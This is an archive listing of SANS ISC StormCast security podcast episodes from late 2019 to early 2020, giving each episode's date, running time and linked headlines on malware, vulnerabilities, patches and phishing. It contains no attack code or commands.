2/25/2020 (7 minutes, 16 seconds)

ISC StormCast for Monday, February 24th 2020

Old Style Excel Macro Malware https://isc.sans.edu/forums/diary/Maldoc+Excel+4+Macros+in+OOXML+Format/25830/
Simple But Efficient VBScript Obfuscation https://isc.sans.edu/forums/diary/Simple+but+Efficient+VBScript+Obfuscation/25828/
Let's Encrypt Beefs Up Validation https://letsencrypt.org/2020/02/19/multi-perspective-validation.html
Google Play Store Joker / Clicker Malware https://research.checkpoint.com/2020/android-app-fraud-haken-clicker-and-joker-premium-dialer/
Google Warns of Microsoft Edge https://www.heise.de/security/meldung/l-f-Google-findet-den-neuen-Edge-Browser-doof-und-unsicher-4665634.html
2/24/2020 (6 minutes, 42 seconds)

ISC StormCast for Friday, February 21st 2020

Enumerating Who "Owns" a Workstation for IR https://isc.sans.edu/forums/diary/Whodat+Enumerating+Who+owns+a+Workstation+for+IR/25822/
Special Update for Adobe After Effects and Media Encoder https://helpx.adobe.com/security/products/after_effects/apsb20-09.html https://helpx.adobe.com/security/products/media-encoder/apsb20-10.html
Cisco Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-on-prem-static-cred-sL8rDs8
Apple To No Longer Accept Certificates as Valid that Exceed a Lifetime of 13 Months https://www.theregister.co.uk/2020/02/20/apple_shorter_cert_lifetime/
Python ReDoS Bugs https://blog.r2c.dev/posts/finding-python-redos-bugs-at-scale-using-dlint-and-r2c/
2/21/2020 (6 minutes, 42 seconds)

ISC StormCast for Thursday, February 20th 2020

Sonicwall Vulnerabilities https://psirt.global.sonicwall.com/vuln-list https://blog.scrt.ch/2020/02/11/sonicwall-sra-and-sma-vulnerabilties/
SQL Server RCE Exploit https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
Ransomware in Switzerland https://www.melani.admin.ch/melani/en/home/dokumentation/newsletter/sicherheitsrisiko-durch-ransomware.html
Peripheral Vulnerabilities in Windows and Linux https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/
2/20/2020 (5 minutes, 46 seconds)

ISC StormCast for Wednesday, February 19th 2020

Discovering Contents of Folders Without Permission https://isc.sans.edu/forums/diary/Discovering+contents+of+folders+in+Windows+without+permissions/25816/
Ring Enforces 2FA https://blog.ring.com/2020/02/18/extra-layers-of-security-and-control/
Iranians Finally Discover VPN Vulnerabilities https://www.clearskysec.com/fox-kitten/
WordPress ThemeGrill Auth Bypass https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/
2/19/2020 (6 minutes, 12 seconds)

ISC StormCast for Tuesday, February 18th 2020

More about Curl on Windows https://isc.sans.edu/forums/diary/curl+and+SSPI/25812/
WHO Warns of Coronavirus Phishing https://www.who.int/about/communications/cyber-security
DUO Security / Google Identify Malicious Chrome Extensions https://duo.com/labs/research/crxcavator-malvertising-2020
2/18/2020 (5 minutes, 41 seconds)

ISC StormCast for Monday, February 17th 2020

Keep an Eye on Command-Line Browsers https://isc.sans.edu/forums/diary/Keep+an+Eye+on+CommandLine+Browsers/25804/
Old Tricks in New Bots: KBOT https://securelist.com/kbot-sometimes-they-come-back/96157/
OpenSSH Now With FIDO/U2F http://www.openssh.com/txt/release-8.2
2/17/2020 (5 minutes, 28 seconds)

ISC StormCast for Friday, February 14th 2020

Changes to Microsoft LDAP/AD And How to Cope with Them https://isc.sans.edu/forums/diary/Authmageddon+deferred+but+not+averted+Microsoft+LDAP+Changes+now+slated+for+Q3Q4+2020/25800/ https://isc.sans.edu/forums/diary/March+Patch+Tuesday+is+Coming+the+LDAP+Changes+will+Change+Your+Life/25796/
SweynTooth BLE Vulnerabilities https://asset-group.github.io/disclosures/sweyntooth/
Symantec Endpoint Protection Multiple Issues https://support.symantec.com/us/en/article.SYMSA1505.html
DNSSEC Root Key Signing Ceremony Delayed https://mm.icann.org/pipermail/root-dnssec-announce/2020/000121.html
2/14/2020 (6 minutes, 44 seconds)

ISC StormCast for Thursday, February 13th 2020

Malspam Pushes Ursnif https://isc.sans.edu/forums/diary/Malpsam+pushes+Ursnif+through+Italian+language+Word+docs/25792/
Safe Documents in Office 365 Advanced Threat Protection https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-docs
WordPress GDPR Cookie Consent Plugin Vulnerability https://blog.nintechnet.com/wordpress-gdpr-cookie-consent-plugin-fixed-vulnerability/
Apple Joins FIDO Alliance https://fidoalliance.org/members/ https://research.kudelskisecurity.com/2020/02/12/fido2-deep-dive-attestations-trust-model-and-security/
2/13/2020 (6 minutes, 3 seconds)

ISC StormCast for Wednesday, February 12th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+for+February+2020/25790/
Adobe Patches https://helpx.adobe.com/security.html
Ransomware Abuses Out of Date Driver https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/
2/12/2020 (22 minutes, 15 seconds)

ISC StormCast for Tuesday, February 11th 2020

PayPal Phish is Asking for Everything https://isc.sans.edu/forums/diary/Current+PayPal+phishing+campaign+or+give+me+all+your+personal+information/25786/
Dell SupportAssist Client Uncontrolled Search Path Vulnerability https://www.dell.com/support/article/ro/ro/robsdt1/sln320101/dsa-2020-005-dell-supportassist-client-uncontrolled-search-path-vulnerability?lang=en
Lock My PC Used By Support Scammers https://fspro.net/lock-pc/ https://www.bleepingcomputer.com/news/security/lock-my-pc-used-by-tech-support-scammers-dev-offers-free-recovery/
Insecure Docker Registries https://unit42.paloaltonetworks.com/leaked-docker-code/
2/11/2020 (6 minutes, 23 seconds)

ISC StormCast for Monday, February 10th 2020

Sandbox Detection Tricks and Nice Obfuscation in a Single VBScript https://isc.sans.edu/forums/diary/Sandbox+Detection+Tricks+Nice+Obfuscation+in+a+Single+VBScript/25780/
Emotet Spreads via WiFi https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/
Exploit Available for sudo pwfeedback Bug https://dylankatz.com/Analysis-of-CVE-2019-18634/
Xiongmai/HiSilicon Vulnerability https://censys.io/blog/probing-the-xiongmai-hisilicon-soc-vulnerability
2/10/2020 (6 minutes, 32 seconds)

ISC StormCast for Friday, February 7th 2020

Critical Bluetooth Vulnerability in Android (CVE-2020-0022) https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/
Wacom Tablets Report Application Details to Google https://robertheaton.com/2020/02/05/wacom-drawing-tablets-track-name-of-every-application-you-open/
Bitbucket Delivers Malware https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware
Realtek HD Audio Driver Package DLL Preloading https://safebreach.com/Post/Realtek-HD-Audio-Driver-Package-DLL-Preloading-and-Potential-Abuses-CVE-2019-19705
2/7/2020 (5 minutes, 37 seconds)

ISC StormCast for Thursday, February 6th 2020

Fake Browser Updates Installing NetSupport RAT https://isc.sans.edu/forums/diary/Fake+browser+update+pages+are+still+a+thing/25774/
Google Android Update https://source.android.com/security/bulletin/2020-02-01#Google-Play-system-updates
5 Cisco Vulnerabilities https://www.armis.com/cdpwn/
2/6/2020 (5 minutes, 50 seconds)

ISC StormCast for Wednesday, February 5th 2020

Google Chrome 80 Released https://www.chromium.org/updates/same-site https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop.html
File Read Vulnerability in WhatsApp https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop.html
HiSilicon DVR Backdoor https://habr.com/en/post/486856/
2/5/2020 (6 minutes, 16 seconds)

ISC StormCast for Tuesday, February 4th 2020

Triple Encrypted AZORult Installer https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/
New sudo Vulnerability (pwfeedback) https://www.sudo.ws/alerts/pwfeedback.html
TeamViewer Password Storage https://whynotsecurity.com/blog/teamviewer/
2/4/2020 (6 minutes, 42 seconds)

ISC StormCast for Monday, February 3rd 2020

Stego and Cryptominers (with video) https://isc.sans.edu/forums/diary/Video+Stego+Cryptominers/25764/
Coronavirus Phishing / Scams https://blog.knowbe4.com/heads-up-scam-of-the-week-coronavirus-phishing-attacks-in-the-wild?nCOV-2019-bc-index https://twitter.com/briankrebs/status/1223959185764896768
Google Open Sources Security Token Software https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html
2/3/2020 (6 minutes, 5 seconds)

ISC StormCast for Friday, January 31st 2020

Chrome Same-Site Cookie Change https://www.chromestatus.com/feature/5088147346030592 https://docs.microsoft.com/en-us/office365/troubleshoot/miscellaneous/chrome-behavior-affects-applications https://caniuse.com/#feat=same-site-cookie-attribute
Avast Apology https://blog.avast.com/a-message-from-ceo-ondrej-vlcek
Magento Update https://helpx.adobe.com/security/products/magento/apsb20-02.html
1/31/2020 (10 minutes, 23 seconds)

ISC StormCast for Thursday, January 30th 2020

Malware Using Text from Impeachment News Coverage https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/ Coronavirus Themed Malware Targets Japan with Emotet https://twitter.com/Cryptolaemus1/status/1222388971428294656 https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b abuse.ch Offers new "I got phished" service https://igotphished.abuse.ch/ OpenSMTPD RCE Vulnerability https://www.openwall.com/lists/oss-security/2020/01/28/3
1/30/2020, 6 minutes, 34 seconds

ISC StormCast for Wednesday, January 29th 2020

Recent Emotet Infection installs Trickbot https://isc.sans.edu/forums/diary/Emotet+epoch+1+infection+with+Trickbot+gtag+mor84/25752/ Apple Updates https://support.apple.com/en-us/HT201222 Zoom Fixes Video Conferencing Brute Forcing Vulnerability https://www.theregister.co.uk/2020/01/28/zoom_eavesdrop_hack/ Intel Fixes Yet Another Information Leakage Flaw https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00329.html https://cacheoutattack.com/ Avast Antivirus Selling Users' Browsing Data https://www.vice.com/en_us/article/qjdkq7/avast-antivirus-sells-user-browsing-data-investigation
1/29/2020, 5 minutes, 27 seconds

ISC StormCast for Tuesday, January 28th 2020

Coronavirus Preparedness and Associated Scams https://isc.sans.edu/forums/diary/Network+Security+Perspective+on+Coronavirus+Preparedness/25750/ RD Gateway RCE Exploit Demoed https://twitter.com/layle_ctf/status/1221514332049113095?s=12 Mitsubishi Electric Compromised via Trend Micro Vulnerability http://www.mitsubishielectric.co.jp/news/2020/0120-b.pdf https://www.zdnet.com/article/trend-micro-antivirus-zero-day-used-in-mitsubishi-electric-hack/
1/28/2020, 4 minutes, 32 seconds

ISC StormCast for Monday, January 27th 2020

Citrix Releases ADC Updates For All Versions https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/ Temporary Windows 0-Day Fix Breaks Printers https://www.reddit.com/r/sysadmin/comments/etumy7/microsoft_ie_zeroday_fix_breaks_hp_printing/ Critical Vulnerabilities in GE Medical Devices https://www.us-cert.gov/ics/advisories/icsma-20-023-01
1/27/2020, 5 minutes, 50 seconds

ISC StormCast for Friday, January 24th 2020

Simple vs. Complex Obfuscation https://isc.sans.edu/forums/diary/Complex+Obfuscation+VS+Simple+Trick/25738/ RD Gateway PoC Exploit Release https://github.com/ollypwn/BlueGate Citrix ADC Compromise Scanner https://github.com/citrix/ioc-scanner-CVE-2019-19781/ LastPass Accidentally Removes Extension from Chrome Web Store https://twitter.com/LastPassStatus/status/1220122561989640192
1/24/2020, 7 minutes, 6 seconds

ISC StormCast for Thursday, January 23rd 2020

German Malspam Pushing Ursnif https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/ Tracking Users Using Safari's Intelligent Tracking Prevention https://arxiv.org/pdf/2001.07421.pdf Muhstik Botnet Targeting Tomato Routers https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/ Cisco Firepower Management Center LDAP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-fmc-auth
1/23/2020, 5 minutes, 55 seconds

ISC StormCast for Wednesday, January 22nd 2020

DeepBlueCLI https://isc.sans.edu/forums/diary/DeepBlueCLI+Powershell+Threat+Hunting/25730/ https://github.com/sans-blue-team/DeepBlueCLI EFS Ransomware https://safebreach.com/Post/EFS-Ransomware Fake Leak Compensation https://www.kaspersky.com/blog/data-leak-compensation-scam/32057/ Criminals Use Fake Job Sites to Defraud Victims https://www.ic3.gov/media/2020/200121.aspx
1/22/2020, 6 minutes, 6 seconds

ISC StormCast for Tuesday, January 21st 2020

Twist on Sextortion https://www.dailymail.co.uk/sciencetech/article-7886055/Sextortion-campaign-targets-users-Google-Nest-smart-camera.html Emotet Uses Extortion to Infect Systems https://www.bleepingcomputer.com/news/security/emotet-malware-dabbles-in-extortion-with-new-spam-template/ Lastpass Outage https://www.theregister.co.uk/2020/01/20/lastpass_outage/ Netgear Signed TLS Cert Private Key Disclosure https://gist.github.com/nstarke/a611a19aab433555e91c656fe1f030a9
1/21/2020, 5 minutes, 46 seconds

ISC StormCast for Monday, January 20th 2020

Microsoft Scripting Engine Memory Corruption Vulnerability https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 CVE-2020-0601 Update https://isc.sans.edu/forums/diary/Summing+up+CVE20200601+or+the+Lets+Decrypt+vulnerability/25720/ Curveball Update https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/ https://isc.sans.edu/diary//25724
1/20/2020, 5 minutes, 30 seconds

ISC StormCast for Friday, January 17th 2020

CVE-2020-0601 Update ("Curveball", "Letsdecrypt") https://isc.sans.edu/forums/diary/Summing+up+CVE20200601+or+the+Lets+Decrypt+vulnerability/25720/ https://curveballtest.com Certain Netscaler Devices Do Not Support Mitigation (article in Dutch) https://www.ncsc.nl/actueel/nieuws/2020/januari/16/door-citrix-geadviseerde-mitigerende-maatregelen-niet-altijd-effectief Cable Haunt Vulnerability https://cablehaunt.com/ STI Student Interview: Jon Michael Lacek https://www.sans.org/reading-room/whitepapers/securecode/changing-devops-culture-security-scan-time-39125
1/17/2020, 14 minutes, 23 seconds

ISC StormCast for Thursday, January 16th 2020

CVE-2020-0601 Followup https://isc.sans.edu/forums/diary/CVE20200601+Followup/25714/ Oracle Patches https://www.oracle.com/security-alerts/cpujan2020.html
1/16/2020, 6 minutes, 28 seconds

ISC StormCast for Wednesday, January 15th 2020

Microsoft January 2020 Patch Tuesday and #CryptoAPI Flaw Webcast: https://sans.org/cryptoapi-isc Diary: https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+for+January+2020/25710/ NSA Release: https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF
1/15/2020, 10 minutes, 2 seconds

ISC StormCast for Tuesday, January 14th 2020

Upcoming Critical MSFT Patch https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/ SIM Swapping is Easy https://www.issms2fasecure.com/assets/sim_swaps-01-10-2020.pdf Google Open Sources wombat dressing room npm publication proxy https://opensource.googleblog.com/2020/01/wombat-dressing-room-npm-publication_10.html
1/14/2020, 7 minutes, 22 seconds

ISC StormCast for Monday, January 13th 2020

Citrix ADC Vulnerability Actively Exploited. Assume vulnerable systems are compromised. Updated Citrix Advisory: https://support.citrix.com/article/CTX267027 Exploit Activity Summary: https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/ Vulnerability Scanner: https://github.com/trustedsec/cve-2019-19781/ Special Webcast: https://i5c.us/citrix YouTube Walk Through of the vulnerability: https://youtu.be/msslpqyf98c
1/13/2020, 7 minutes, 36 seconds

ISC StormCast for Friday, January 10th 2020

Another Malicious Word Document https://isc.sans.edu/forums/diary/Quick+Analyzis+of+another+Maldoc/25694/ SHA1 Update https://sha-mbles.github.io/ Cisco Updates https://tools.cisco.com/security/center/publicationListing.x Mandy Galante: Girls Go Cyberstart (register now. Play Jan 13th-31st) https://www.girlsgocyberstart.org/
1/10/2020, 10 minutes, 38 seconds

ISC StormCast for Thursday, January 9th 2020

Critical Firefox Update Fixing Exploited Bug https://www.mozilla.org/en-US/security/advisories/mfsa2020-03/ 3 Google Play Store Apps Exploit Android Zero-Day https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/ Tails 4.2 https://tails.boum.org/news/version_4.2/index.en.html TikTok Vulnerabilities https://research.checkpoint.com/2020/tik-or-tok-is-tiktok-secure-enough/
1/9/2020, 5 minutes, 41 seconds

ISC StormCast for Wednesday, January 8th 2020

Citrix ADC Update https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/ Pulse Secure SSLVPN Exploited https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/ https://www.darkreading.com/attacks-breaches/widely-known-flaw-in-pulse-secure-vpn-being-used-in-ransomware-attacks/d/d-id/1336729 Google Project Zero Changing Disclosure Policy https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html Google Updates Android https://source.android.com/security/bulletin/2020-01-01
1/8/2020, 5 minutes, 29 seconds

ISC StormCast for Tuesday, January 7th 2020

Spoofed Scans from 103/8 https://isc.sans.edu/forums/diary/Increase+in+Number+of+Sources+January+3rd+and+4th+spoofed/25678/ Iran Terror Threat https://www.dhs.gov/sites/default/files/ntas/alerts/20_0104_ntas_bulletin.pdf BusKill Laptop Kill Cord https://tech.michaelaltfield.net/2020/01/02/buskill-laptop-kill-cord-dead-man-switch/
1/7/2020, 5 minutes, 10 seconds

ISC StormCast for Monday, January 6th 2020

Quick Summary of the California Consumer Privacy Act https://isc.sans.edu/forums/diary/CCPA+Quick+Overview/25668/ Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x XiaoMi Camera Cache Bug https://www.reddit.com/r/googlehome/comments/eine1m/when_i_load_the_xiaomi_camera_in_my_google_home/
1/6/2020, 4 minutes, 31 seconds

ISC StormCast for Friday, January 3rd 2020

Ransomware written in JavaScript using Node.js https://isc.sans.edu/forums/diary/Ransomware+in+Nodejs/25664/ Landry Restaurant PoS Breach https://www.landrysinc.com/CreditNotice/CANotice.asp Holiday Hack Challenge https://www.holidayhackchallenge.com Citrix/NetScaler Vulnerability Special Webcast Recording https://i5c.us/citrix
1/3/2020, 8 minutes, 24 seconds

ISC StormCast for Tuesday, December 31st 2019

ISC API Update https://isc.sans.edu/api https://isc.sans.edu/forums/diary/Miscellaneous+Updates+to+our+Threatfeed+API/25654/ CCC Conference https://fahrplan.events.ccc.de/congress/2019/Fahrplan/ https://events.ccc.de/congress/2019/wiki/index.php/Main_Page
12/31/2019, 6 minutes, 37 seconds

ISC StormCast for Monday, December 30th 2019

Breaking 2FA Soft Tokens https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf PiHole Dashboard https://isc.sans.edu/forums/diary/ELK+Dashboard+for+Pihole+Logs/25652/ Corrupt Office Documents https://isc.sans.edu/forums/diary/Corrupt+Office+Documents/25650/ Enumerating Office 365 Users https://isc.sans.edu/forums/diary/Enumerating+office365+users/25648/
12/30/2019, 5 minutes, 56 seconds

ISC StormCast for Friday, December 27th 2019

Citrix Application Delivery Controller (Netscaler ADC) Critical Vulnerability https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/ https://support.citrix.com/article/CTX267027
12/27/2019, 3 minutes, 44 seconds

ISC StormCast for Monday, December 23rd 2019

Extracting VBA Macros From .DWG Files https://isc.sans.edu/forums/diary/Extracting+VBA+Macros+From+DWG+Files/25634/ Cisco PKI Self-Signed Certificate Expiration https://www.cisco.com/c/en/us/support/docs/field-notices/704/fn70489.html AFRINIC IP Address Space Misappropriated By Insider https://mybroadband.co.za/news/internet/330379-how-internet-resources-worth-r800-million-were-stolen-and-sold-on-the-black-market.html
12/23/2019, 4 minutes, 34 seconds

ISC StormCast for Friday, December 20th 2019

More DNS over HTTPS Details https://isc.sans.edu/forums/diary/More+DNS+over+HTTPS+Become+One+With+the+Packet+Be+the+Query+See+the+Query/25628/ Ransomware Outing Victims https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/ Google Chrome Update https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop_17.html
12/20/2019, 5 minutes, 12 seconds

ISC StormCast for Thursday, December 19th 2019

An Emotet Update https://isc.sans.edu/forums/diary/Emotet+infection+with+spambot+activity/25622/ Emotet Used to Spread Malware From German Federal Agency Accounts (in German) https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2019/Spam-Bundesbehoerden_181219.html Joomla Patches SQL Injection https://developer.joomla.org/security-centre.html Unicode Mapping Problems https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
12/19/2019, 3 minutes, 46 seconds

ISC StormCast for Wednesday, December 18th 2019

Discovering DNS over HTTPS https://isc.sans.edu/forums/diary/Is+it+Possible+to+Identify+DNS+over+HTTPs+Without+Decrypting+TLS/25616/ Ring Camera Weaknesses https://www.vice.com/en_us/article/epg4xm/amazon-ring-camera-security WhatsApp DoS Bug https://research.checkpoint.com/2019/breakingapp-whatsapp-crash-data-loss-bug/
12/18/2019, 6 minutes

ISC StormCast for Tuesday, December 17th 2019

Slack "Unshare" Not Working As Expected https://www.theregister.co.uk/2019/12/16/slack_filesharing_vulnerability_post_sharing/ Google Making OAuth Mandatory for GSuite https://gsuiteupdates.googleblog.com/2019/12/less-secure-apps-oauth-google-username-password-incorrect.html TPLink Authentication Bypass https://securityintelligence.com/posts/tp-link-archer-router-vulnerability-voids-admin-password-can-allow-remote-takeover/ Factoring IoT RSA Keys https://info.keyfactor.com/factoring-rsa-keys-in-the-iot-era
12/17/2019, 6 minutes, 17 seconds

ISC StormCast for Monday, December 16th 2019

VBA Macros in Autocad https://isc.sans.edu/forums/diary/Malicious+DWG+Files/25612/ OpenBSD Privilege Escalation Vulnerability https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt NPM Fixes Critical Security Vulnerability https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli
12/16/2019, 5 minutes, 40 seconds

ISC StormCast for Friday, December 13th 2019

Malware Information Sharing https://isc.sans.edu/forums/diary/Code+Data+Reuse+in+the+Malware+Ecosystem/25598/ Apple Improves Tracking Prevention Tracking in WebKit https://webkit.org/blog/9661/preventing-tracking-prevention-tracking/ Google Verified SMS Messages https://www.blog.google/products/messages/safer-conversations-messages-verified-sms-and-spam-protection/ Echobot Keeps Adding More Exploits https://www.bleepingcomputer.com/news/security/new-echobot-variant-exploits-77-remote-code-execution-flaws/ STI Research Paper: Caleb Baker DNS Monitoring https://www.sans.org/reading-room/whitepapers/dns/challenges-effective-dns-query-monitoring-39215
12/13/2019, 14 minutes, 28 seconds

ISC StormCast for Thursday, December 12th 2019

German Malspam Installs Trickbot https://isc.sans.edu/forums/diary/German+language+malspam+pushes+yet+another+wave+of+Trickbot/25594/ Vulnerable KeyWe Smart Lock https://labs.f-secure.com/advisories/keywe-smart-lock-unauthorized-access-traffic-interception Google Chrome Update https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html iOS Spam Feature https://support.apple.com/en-us/HT210756 https://kishanbagaria.com/airdos/
12/12/2019, 5 minutes, 17 seconds

ISC StormCast for Wednesday, December 11th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+December+2019+Patch+Tuesday/25592/ https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/ Adobe Patch Tuesday https://helpx.adobe.com/security.html Apple Security Updates https://support.apple.com/en-us/HT201222 Intel Plundervolt Update https://blogs.intel.com/technology/2019/12/ipas-security-advisories-for-december-2019/
12/11/2019, 6 minutes, 48 seconds

ISC StormCast for Tuesday, December 10th 2019

Another Word Maldoc https://isc.sans.edu/forums/diary/Lazy+Sunday+Maldoc+Analysis/25586/
Snatch Ransomware Reboots System Into Safe Mode To Disable Antivirus https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
Ryuk Ransomware Decryptor May No Longer Work / Corrupt Documents https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/
Extending Windows 7 Security Updates https://www.ghacks.net/2019/12/07/someone-found-a-way-to-bypass-windows-7-extended-security-updates-checks/
SwiftOnSecurity Updates Sysmon Rules https://github.com/SwiftOnSecurity/sysmon-config
RSA Webcast https://www.rsaconference.com/industry-topics/webcast/36-five-most-dangerous-attacks-evolving
12/10/2019 7 minutes, 55 seconds

ISC StormCast for Monday, December 9th 2019

E-Mail Includes Entire HTML/JavaScript Phishing Kit https://isc.sans.edu/forums/diary/Phishing+with+a+selfcontained+credentialsstealing+webpage/25580/
Great Cannon Activated to Silence Pro-Hong Kong Forum https://cybersecurity.att.com/blogs/labs-research/the-great-cannon-has-been-deployed-again
12/9/2019 6 minutes, 9 seconds

ISC StormCast for Friday, December 6th 2019

OpenBSD Authentication Bypass and Privilege Escalation Vulnerability https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.58244398.587934852.1575530822-682141427.1570559125
Hijacking Linux (and BSD) VPN Connections https://seclists.org/oss-sec/2019/q4/122
RASP vs. WAF: Alexander Fry Research Paper https://www.sans.org/reading-room/whitepapers/application/runtime-application-self-protection-rasp-investigation-effectiveness-rasp-solution-protecting-vulnerable-target-applications-38950
12/6/2019 14 minutes, 1 second

ISC StormCast for Thursday, December 5th 2019

Atlassian Companion App / IBM Aspera Cloud https://www.theregister.co.uk/2019/12/05/atlassian_zero_day_bug/ https://confluence.atlassian.com/doc/administering-the-atlassian-companion-app-958456281.html https://twitter.com/tmslft/status/1202056063878606848?s=20
Fake Python Library in PyPI https://github.com/dateutil/dateutil/issues/984
GoAhead Web Server Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2019-0888
12/5/2019 6 minutes, 1 second

ISC StormCast for Wednesday, December 4th 2019

Avast Online Security and Avast Secure Browser Blocked for Spying on Users https://palant.de/2019/10/28/avast-online-security-and-avast-secure-browser-are-spying-on-you/
Google Android Updates https://source.android.com/security/bulletin/2019-12-01
Strandhogg Vulnerability https://promon.co/security-news/strandhogg/
Firefox 71 Released https://www.mozilla.org/en-US/security/advisories/mfsa2019-34/
12/4/2019 6 minutes, 11 seconds

ISC StormCast for Tuesday, December 3rd 2019

Increased Scans on Port 26 https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/
Recent Ursnif Malspam https://isc.sans.edu/forums/diary/Ursnif+infection+with+Dridex/25566/
Windows 7 Extended Security Updates https://www.microsoft.com/microsoft-365/partners/news/article/announcing-paid-windows-7-extended-security-updates
QNAP Patches Photo Station https://www.qnap.com/en/security-advisory/nas-201911-25
12/3/2019 5 minutes, 53 seconds

ISC StormCast for Monday, December 2nd 2019

Agent Tesla Malware Sample Analysis https://isc.sans.edu/forums/diary/Finding+an+Agent+Tesla+malware+sample/25554/
Search With SauronEye https://isc.sans.edu/forums/diary/ISC+Snapshot+Search+with+SauronEye/25558/
Splunk Y2K20 Patch https://docs.splunk.com/Documentation/Splunk/8.0.0/ReleaseNotes/FixDatetimexml2020
Google TAG Quarterly Summary https://blog.google/technology/safety-security/threat-analysis-group/protecting-users-government-backed-hacking-and-disinformation/
12/2/2019 6 minutes, 43 seconds

ISC StormCast for Wednesday, November 27th 2019

Playing With Phishing https://isc.sans.edu/forums/diary/Lessons+learned+from+playing+a+willing+phish/25552/
HPE SSD Drives Will Stop Working in 3 Years https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00092491en_us
Malicious Android SDK Captures Social Media Data https://help.twitter.com/en/sdk-issue
Kaspersky API Exposed to Websites https://palant.de/2019/11/26/internal-kaspersky-api-exposed-to-websites/
Malicious Ad Statistics https://www.confiant.com/Demand-Quality-Report-Q3-2019
11/27/2019 5 minutes, 47 seconds

ISC StormCast for Tuesday, November 26th 2019

DNS over HTTPS (DoH) in SOHO Networks https://isc.sans.edu/forums/diary/My+Little+DoH+Setup/25548/
Fortinet Weak Crypto https://sec-consult.com/en/blog/advisories/weak-encryption-cipher-and-hardcoded-cryptographic-keys-in-fortinet-products/
Tracking Web Users via DNS https://github.com/uBlockOrigin/uBlock-issues/issues/780
11/26/2019 4 minutes, 38 seconds

ISC StormCast for Monday, November 25th 2019

Web Filter Misconfiguration Abused for Reconnaissance https://isc.sans.edu/forums/diary/Abusing+Web+Filters+Misconfiguration+for+Reconnaissance/25538/
Local Malware Analysis with Malice https://isc.sans.edu/forums/diary/Local+Malware+Analysis+with+Malice/25544/
Multiple Vulnerabilities in VNC https://www.kaspersky.com/blog/vnc-vulnerabilities/31462/
11/25/2019 5 minutes, 21 seconds

ISC StormCast for Friday, November 22nd 2019

Weaknesses in Memory Encryption Solutions https://arxiv.org/abs/1908.11680
GetMonero Wallet Compromised https://web.getmonero.org/2019/11/19/warning-compromised-binaries.html
RIPlace Ransomware Detection Bypass https://www.nyotron.com/blog/nyotron-discovers-potentially-unstoppable-ransomware-evasion-technique-riplace/
Microsoft Office Remote Content Triggers in Preview Pane https://medium.com/@curtbraz/getting-malicious-office-documents-to-fire-with-protected-view-4de18668c386
11/22/2019 6 minutes, 16 seconds

ISC StormCast for Thursday, November 21st 2019

Latest Hancitor Malspam Update https://isc.sans.edu/forums/diary/Hancitor+infection+with+Pony+Evil+Pony+Ursnif+and+Cobalt+Strike/25532/
